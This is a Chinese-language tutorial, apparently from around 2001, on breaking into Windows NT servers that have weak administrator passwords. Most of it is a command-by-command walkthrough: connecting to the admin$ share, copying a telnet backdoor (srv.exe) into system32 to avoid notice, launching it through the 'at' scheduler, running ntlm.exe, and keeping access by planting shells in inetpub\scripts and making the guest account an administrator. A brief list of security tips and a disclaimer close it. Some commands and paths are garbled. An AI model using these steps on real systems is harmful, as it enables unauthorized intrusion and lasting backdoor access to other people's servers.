综合运用
好了,现在我们转入正题。首先我们用流光扫描一段网址的NT机器,同时找开流光的IPC简单探测功能,就可以找到一些密码为空或者密码非常简单的服务器了。如图3:
这里,我们假设已经找到一台符合条件的服务器,IP是2.2.2.2,用户名ldh,密码ldh,并且ldh在administrators组中:
☆ 1.远程登录服务器
c:\net use \\2.2.2.2\admin$ “ldh”/user: “ldh”
返回:
命令成功完成。
OK,现在已经与远程服务器连接上了。
此时用net use命令可得到本机连接状态为:
状态 本地 远程 网络
---------------------------
OK\\2.2.2.2\admin$ Microsoft Windows网络
命令成功完成。
☆ 2.复制文件
登录成功之后先复制一个Telnet的程序上去小熔流光安装目录下的Tools目录里的Srv.exe,这个程序是在NT上面开一个Telnet服务,端口是99。
c:\copyc:\srv.exe\\2.2.2.2\admin$
(admin $是NT的默认的陷藏共享,他对应的是NT安装目录里的system32目录。通常是在c\winnt\system32,你也可以用C$,D$他们分别代表盘符C盘,D盘.都是系统的默认共享。通常我们把程序拷贝到admin$,因为这里的文件比较多,不容易被发现。同时启动时也不必指定具体目录。)
若系统返回:
已复制 1个文件。
则表示我们的文件复制操作己完成。
☆ 3.启动程序
现在的问题就是如何启动这个程序了。NT上面有Schedule服务,我们可以利用它来启动这个程序。首先看一下对方此时的时间,以便决定何时启动。
net time \\2.2.2.2
返回:
\\2.2.2.2的当前时间是2001/9/30下午05 55
命令成功完成。
啊,远程服务器的时间是2001/9/30下午05 55(我的机器已经快7.00了,看来着个服务器的管理员没什么时间观念~0~)。
接着我们用Schedule服务启动的程序
at\\2.2.2.21800srv.exe
返回:
新加了一项作业,其作业 ID=1
现在,等着服务程序启动吧。什么,你的返回信息不是这个,那多半是对方没有启动Schedule服务了。管理员没启动那我们就帮他启动,要知道现在我们也是管理员呀 (ldh在administrators组中)。
远程启动方法为:
netsvc\\211.21.193.202Schedule/start
(NetSvc在小榕流光目录的tools目录下)
下面的操作就不用我说了吧。
☆ 4.启动TELNET服务
srv.exe开的端口是99。这个程序的优点是不用输入口令和没有日志记录。每一次使用后都会自动关闭,但下次要用时只有重新启动后才能用。
对了,在这之前,我们还需要复制一个文件到远程服务器备用。在DOS窗口中敲入命令:
copy c:\ntlm.exe\\2.2.2.2\admin$
把ntlm(在小榕流光目录的tools目录下)拷贝过去。
下面,利用TELNET远程登录服务器
telnet 2.2.2.2 99
接着,在远程服务器上运行ntlm
C:\WINNT\system32ntlm
显示:
说明我们就成功了。现在我们试着用 net命令来停止telnet并重新启动这个服务。
C:\WINNT\system32net start telnet(图4)。
☆ 5.留下后门
这时我们要留下一个后门,比如把srv.exe放
在c:\inetpub\scripts。以便管理员改了密码后,下次再次可以通过测览器访问这台机器。当然我们也可以把cmd.exe拷贝到c:\metpub入scripts下并改成另外一个名字。比如c.exe,也是下次获得再次访问的好方法。
当然我们把目标机器的guest账号激活并把它添加到管理员组应该是最好的。下面我就向大家介绍这一种。
(1)将Guest用户激活:
C:\net user guest/active yes
(2)将Guest的密码改为你要设定的密码:
C:\net user guest test
(3)将Guest变为Administrator
C:\net localgrou administrators guest/add (图5)
如果管理员密码更改,guest账号没改变的话,下次我们就以用guest再次访问这台计算机了。
☆ 6.断开与服务器的连接
c:\netuse\\2.2.2.2\admin$/delete
返回:\\2.2.2.2\admin$已经删除。此时再用netuse命令会发现连接已不存在
状态 本地 远程 网络
---------------------------
命令成功完成。
好了,敲Exit退出。至此一次攻击结束。
安全建议:
1.安装防火墙软件;
2.禁用 "Task Scheduler""RunAs Service"服务 (除非必需).
3.按装最新的系统补丁;
4.密码不要太简单 (特别是管理员密码),一般密码长度应不少于6位。
在本文中我们选取了两个简单的入侵Windows NT的方法,我们并不是要去指导大家如何去攻击别人的机器,但毕竟存在这部分人,我们就要去防范他们的攻击,所以希望这篇文章能对那些对系统安全问题不屑一顾的朋友加强防范!
